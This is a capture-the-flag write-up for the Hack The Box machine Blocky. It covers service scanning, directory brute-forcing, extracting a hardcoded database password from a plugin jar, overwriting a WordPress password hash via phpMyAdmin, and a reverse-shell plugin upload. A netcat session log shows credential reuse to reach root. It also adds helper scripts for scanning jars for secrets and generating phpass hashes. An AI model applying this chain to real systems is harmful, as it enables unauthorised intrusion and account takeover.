Blocky

I’m getting out of order now. Whoops.

Ports

This has got:

  21/tcp    open   ftp       ProFTPD 1.3.5a
  22/tcp    open   ssh       OpenSSH 7.2p2
  80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu))
  8192/tcp  closed sophos
  25565/tcp open   minecraft Minecraft 1.11.2

FTP

ProFTPD 1.3.5 had a horrible vulnerability, the mod_copy SITE CPFR/CPTO bug (CVE-2015-3306) that lets an unauthenticated client copy files around on the server; it was fixed in 1.3.5a, which is what's running here. No anonymous access either. Moving on.

HTTP

We have a WordPress site, but let's run feroxbuster first:

┌──(root💀kali)-[/opt/htb/blocky]
└─# feroxbuster -u http://10.10.10.37 -w /usr/share/seclists/Discovery/Web-Content/common.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.2.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.10.37
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.2.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
403       11l       32w      290c http://10.10.10.37/.hta
403       11l       32w      299c http://10.10.10.37/server-status
301        9l       28w      313c http://10.10.10.37/wp-admin
301        9l       28w      315c http://10.10.10.37/wp-content
403       11l       32w      299c http://10.10.10.37/wp-admin/.hta
403       11l       32w      301c http://10.10.10.37/wp-content/.hta
301        0l        0w        0c http://10.10.10.37/index.php
301        9l       28w      322c http://10.10.10.37/wp-admin/includes
301        9l       28w      315c http://10.10.10.37/phpmyadmin
405        1l        6w       42c http://10.10.10.37/xmlrpc.php
301        9l       28w      323c http://10.10.10.37/wp-content/uploads
302        0l        0w        0c http://10.10.10.37/wp-admin/index.php
301        9l       28w      320c http://10.10.10.37/wp-admin/images
301        9l       28w      319c http://10.10.10.37/wp-admin/maint
301        9l       28w      322c http://10.10.10.37/wp-content/themes
301        9l       28w      317c http://10.10.10.37/wp-admin/css
301        9l       28w      309c http://10.10.10.37/wiki
403       11l       32w      308c http://10.10.10.37/wp-admin/includes/.hta
403       11l       32w      308c http://10.10.10.37/wp-content/themes/.hta
403       11l       32w      303c http://10.10.10.37/wp-admin/css/.hta
403       11l       32w      295c http://10.10.10.37/.htaccess
403       11l       32w      301c http://10.10.10.37/phpmyadmin/.hta
301        9l       28w      312c http://10.10.10.37/plugins
403       11l       32w      306c http://10.10.10.37/wp-admin/images/.hta
403       11l       32w      309c http://10.10.10.37/wp-content/uploads/.hta
200        0l        0w        0c http://10.10.10.37/wp-content/index.php
403       11l       32w      295c http://10.10.10.37/wiki/.hta
403       11l       32w      305c http://10.10.10.37/wp-admin/maint/.hta
403       11l       32w      298c http://10.10.10.37/plugins/.hta
301        9l       28w      321c http://10.10.10.37/wp-admin/network
301        9l       28w      319c http://10.10.10.37/phpmyadmin/doc
403       11l       32w      310c http://10.10.10.37/wp-admin/maint/.htpasswd
403       11l       32w      310c http://10.10.10.37/phpmyadmin/doc/.htaccess
403       11l       32w      310c http://10.10.10.37/phpmyadmin/doc/.htpasswd
[####################] - 1m     65534/65534   0s      found:34      errors:47240  
[####################] - 57s     4681/4681    84/s    http://10.10.10.37
[####################] - 46s     4681/4681    104/s   http://10.10.10.37/wp-admin
[####################] - 42s     4681/4681    112/s   http://10.10.10.37/wp-content
[####################] - 33s     4681/4681    141/s   http://10.10.10.37/wp-admin/includes
[####################] - 38s     4681/4681    135/s   http://10.10.10.37/phpmyadmin
[####################] - 34s     4681/4681    137/s   http://10.10.10.37/wp-content/uploads
[####################] - 34s     4681/4681    151/s   http://10.10.10.37/wp-admin/images
[####################] - 35s     4681/4681    132/s   http://10.10.10.37/wp-admin/maint
[####################] - 33s     4681/4681    139/s   http://10.10.10.37/wp-content/themes
[####################] - 33s     4681/4681    140/s   http://10.10.10.37/wp-admin/css
[####################] - 31s     4681/4681    150/s   http://10.10.10.37/wiki
[####################] - 29s     4681/4681    177/s   http://10.10.10.37/plugins
[####################] - 17s     4681/4681    386/s   http://10.10.10.37/wp-admin/network
[####################] - 21s     4681/4681    235/s   http://10.10.10.37/phpmyadmin/doc

Lots of juicy stuff there! At /plugins we find a Cute File Browser listing with two files: BlockyCore.jar and griefprevention-1.11.2-3.1.1.298.jar.

We can extract the jar:

┌──(root💀kali)-[/opt/htb/blocky]
└─# jar -xf BlockyCore.jar                                                 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

That gives us com/myfirstplugin/BlockyCore.class. I don't have a Java decompiler installed, so I go to http://www.javadecompilers.com/ and decompile the file:

// 
// Decompiled by Procyon v0.5.36
// 

package com.myfirstplugin;

public class BlockyCore
{
    public String sqlHost;
    public String sqlUser;
    public String sqlPass;
    
    public BlockyCore() {
        this.sqlHost = "localhost";
        this.sqlUser = "root";
        this.sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
    }
    
    public void onServerStart() {
    }
    
    public void onServerStop() {
    }
    
    public void onPlayerJoin() {
        this.sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
    }
    
    public void sendMessage(final String username, final String message) {
    }
}
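A decompiler is not actually needed to find what we just saw: string literals live in the class file's constant pool, so a small constant-pool parser (or even strings on the .class) pulls them out directly, and reporting only CONSTANT_String entries keeps identifiers such as sqlPass and type descriptors out of the noise. The following Python is an added example, not part of the original writeup or of the BlockyCore plugin; the class file and jar it scans are constructed inside the script (build_class and sample_jar are fixtures made up for the demo, and the password from the decompiled source is reused only as sample data), so it runs offline against a stand-in rather than the real BlockyCore.jar.

```python
import io
import re
import struct
import zipfile

# JVM constant-pool tags (JVMS section 4.4) and the size of each fixed-length payload.
# CONSTANT_Utf8 (tag 1) is variable-length and handled separately.
TAG_UTF8, TAG_LONG, TAG_DOUBLE, TAG_STRING = 1, 5, 6, 8
FIXED_PAYLOAD = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
                 12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

# Heuristic for "looks like a credential": 16+ chars, mixed case plus digits, no spaces.
SECRET_RE = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)[A-Za-z0-9+/=_\-]{16,}$")


def string_literals(class_bytes):
    """Return the string literals of one .class file, in constant-pool order.

    Only CONSTANT_String entries (tag 8) are returned, i.e. literals the code uses,
    not the CONSTANT_Utf8 entries that hold field names, descriptors and class names.
    """
    magic, _minor, _major, count = struct.unpack(">IHHH", class_bytes[:10])
    if magic != 0xCAFEBABE:
        raise ValueError("not a class file")
    pos, idx = 10, 1
    utf8 = {}           # pool index -> decoded text
    literal_refs = []   # pool indices referenced by CONSTANT_String entries
    while idx < count:
        tag = class_bytes[pos]
        pos += 1
        if tag == TAG_UTF8:
            (length,) = struct.unpack(">H", class_bytes[pos:pos + 2])
            pos += 2
            # The JVM stores "modified UTF-8"; plain UTF-8 decoding is fine for ASCII secrets.
            utf8[idx] = class_bytes[pos:pos + length].decode("utf-8", "replace")
            pos += length
        elif tag == TAG_STRING:
            (ref,) = struct.unpack(">H", class_bytes[pos:pos + 2])
            pos += 2
            literal_refs.append(ref)
        elif tag in FIXED_PAYLOAD:
            pos += FIXED_PAYLOAD[tag]
        else:
            raise ValueError("unknown constant-pool tag %d at offset %d" % (tag, pos - 1))
        # Long and Double occupy two pool slots (the second slot is unusable).
        idx += 2 if tag in (TAG_LONG, TAG_DOUBLE) else 1
    return [utf8[r] for r in literal_refs if r in utf8]


def looks_like_secret(text):
    return bool(SECRET_RE.match(text))


def scan_jar(jar_bytes):
    """Map each .class member of a jar to the string literals that look like secrets."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            if not name.endswith(".class"):
                continue
            hits = [s for s in string_literals(jar.read(name)) if looks_like_secret(s)]
            if hits:
                findings[name] = hits
    return findings


def build_class(literals, identifiers):
    """Constructed fixture: a minimal class file whose constant pool holds the given string
    literals (tag 8 -> tag 1) and bare identifiers (tag 1 only). Not a compilable class;
    only the constant pool matters to the parser, the trailer is empty."""
    pool, next_idx = [], 1
    pool.append(bytes([TAG_LONG]) + struct.pack(">q", 1234))   # exercises the two-slot rule
    next_idx += 2
    for ident in identifiers:
        raw = ident.encode()
        pool.append(bytes([TAG_UTF8]) + struct.pack(">H", len(raw)) + raw)
        next_idx += 1
    for lit in literals:
        raw = lit.encode()
        pool.append(bytes([TAG_UTF8]) + struct.pack(">H", len(raw)) + raw)
        pool.append(bytes([TAG_STRING]) + struct.pack(">H", next_idx))  # points at that Utf8
        next_idx += 2
    header = struct.pack(">IHHH", 0xCAFEBABE, 0, 52, next_idx)  # count = slots used + 1
    trailer = struct.pack(">7H", *([0] * 7))  # access_flags .. attributes_count, all empty
    return header + b"".join(pool) + trailer


def sample_jar():
    """Constructed jar standing in for BlockyCore.jar (not the real file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("com/myfirstplugin/Fake.class", build_class(
            ["localhost", "root", "8YsqfCTnvxAUeduzjNSXe22", "Welcome to the BlockyCraft!!!!!!!"],
            ["sqlHost", "sqlUser", "sqlPass", "Ljava/lang/String;"]))
    return buf.getvalue()


if __name__ == "__main__":
    for member, hits in scan_jar(sample_jar()).items():
        print(member, hits)
```

Point scan_jar at the bytes of a real jar and every .class inside is checked the same way; the regex is deliberately loose, so expect to eyeball the hits, but on a plugin like this one the database password stands out immediately while "localhost", "root" and the welcome message are filtered away.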

Those creds look interesting! Let's try them on phpMyAdmin. They work, and in the wp_users table we can grab the user_pass hash for the lone WordPress user, notch. It doesn't want to crack immediately with John, so I overwrite it with:

$P$BDZFisiinAqGeR02VRcdlEcP7IZvxL1

This is a WordPress (phpass) hash of the string password. Keep a copy of the original hash before overwriting it so the account can be put back afterwards. With this changed I can log in at /wp-admin/, upload a plugin as a zip file containing PHP that connects back to my listener, and get a shell as www-data.
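The replacement hash is a phpass "portable" hash, the format WordPress stores in user_pass: $P$, one character encoding the iteration count (B is 2^13 = 8192 rounds), an 8-character salt, then 22 characters of phpass' own base64 over an iterated MD5. Generating one yourself and verifying it beats borrowing a stranger's, and the same routine confirms the original hash still verifies once you restore it. The Python below is an added example, not code from the original writeup or from WordPress; the salt DZFisiin is simply lifted from the hash quoted above, and the wp_users/user_pass names in the comment assume the default wp_ table prefix.

```python
import hashlib
import hmac
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw, count):
    """phpass' base64 variant: little-endian 6-bit groups over the ITOA64 alphabet."""
    out, i = [], 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def _crypt_private(password, setting):
    """phpass crypt_private(): hash `password` under the $P$<count><salt> prefix of `setting`."""
    if setting[:3] not in ("$P$", "$H$") or len(setting) < 12:
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    salt = setting[4:12]
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):           # 'B' -> 2**13 = 8192 rounds
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_hash(password, salt=None, count_log2=13):
    """Produce a WordPress-compatible $P$ hash (count_log2=13 is WordPress's default)."""
    if salt is None:
        salt = _encode64(os.urandom(6), 6)     # 6 random bytes -> 8 salt characters
    if len(salt) != 8:
        raise ValueError("salt must be 8 characters")
    return _crypt_private(password, "$P$" + ITOA64[count_log2] + salt)


def phpass_check(password, stored):
    """True if `password` matches the stored hash; malformed hashes never verify."""
    try:
        return hmac.compare_digest(_crypt_private(password, stored), stored)
    except ValueError:
        return False


if __name__ == "__main__":
    new_hash = phpass_hash("password", salt="DZFisiin")
    print(new_hash)
    # Applied from phpMyAdmin's SQL tab (default wp_ prefix assumed), after saving the
    # original user_pass value so it can be restored:
    #   UPDATE wp_users SET user_pass = '<new_hash>' WHERE user_login = 'notch';
    print(phpass_check("password", new_hash), phpass_check("Password", new_hash))
```

phpass_check("password", "$P$BDZFisiinAqGeR02VRcdlEcP7IZvxL1") tells you whether the hash quoted above really is "password" before you paste it into the database, and phpass_check against the saved original after the engagement confirms the restore worked; the $H$ prefix accepted alongside $P$ is the same scheme as used by phpBB.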

Privesc

The privesc was very simple: the password we extracted from the JAR file is also notch's system password, and notch is in the sudo group, so su followed by sudo su gives root.

┌──(root💀kali)-[/opt/htb/blocky]
└─# nc -nvlp 1234                                                         

listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.37] 43190
bash: cannot set terminal process group (1464): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Blocky:/var/www/html/wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash");'
<ml/wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@Blocky:/var/www/html/wp-admin$ su notch
su notch
Password: 8YsqfCTnvxAUeduzjNSXe22

notch@Blocky:/var/www/html/wp-admin$ sudo su
sudo su
[sudo] password for notch: 8YsqfCTnvxAUeduzjNSXe22

root@Blocky:/var/www/html/wp-admin# cd /root
cd /root
root@Blocky:~# cat root.txt
cat root.txt
# flag goes here

Another one bites the dust.